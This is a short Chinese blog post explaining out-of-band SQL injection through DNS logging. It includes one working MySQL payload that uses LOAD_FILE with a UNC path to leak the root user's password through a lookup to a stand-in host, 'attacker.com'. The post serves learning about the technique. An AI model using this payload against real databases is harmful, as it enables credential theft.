另一种的SQL注入和DNS结合的技巧

这个技巧有些另类,当时某业界大佬提点了一下。当时真的真的没有理解到那种程度,现在可能也是没有理解到,但是我会努力。

本文章是理解于:http://netsecurity.51cto.com/art/201503/469621.htm

链接中的文章主要说的是什么?

先愉快的介绍了DNS工作原理,注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。

这种攻击方式需要提前能查看DNS日志,利用SQL注入语句返回信息,迫使DNS递归,然后DNS日志的记录。

日志中就有SQL注入返回信息了。

例如:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root'
 LIMIT 1),'.attacker.com\\foobar'));

 

返回了:\\\\返回值(password).attacker.com\\foobar。触发了DNS递归,导致日志记录。

 

posted @ 2017-05-24 23:59  米怀特  阅读(1498)  评论(0编辑  收藏  举报